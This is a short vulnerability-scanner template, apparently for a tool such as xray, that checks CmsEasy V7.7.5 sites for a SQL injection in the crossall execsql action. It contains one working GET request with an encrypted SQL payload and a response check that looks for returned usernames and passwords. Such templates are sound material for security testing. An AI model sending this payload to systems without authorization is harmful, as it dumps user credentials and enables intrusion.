id: cmseasy-crossall-act-php-sql-injection

info:
  name: CmsEasy crossall_act.php SQL注入漏洞
  author: daffainfo
  severity: high
  verified: true
  description: CmsEasy 存在SQL注入漏洞，通过文件 service.php 加密SQL语句执行即可执行任意SQL命令。影响版本:CmsEasy V7.7.5_20210919 body="cmseasyedit"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/CmsEasy%20crossall_act.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5
    expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"password":') && response.body.bcontains(b'"userid":') && response.body.bcontains(b'"qqlogin":') && response.body.bcontains(b'"alipaylogin":') && response.body.bcontains(b'"wechatlogin":')
expression: r0()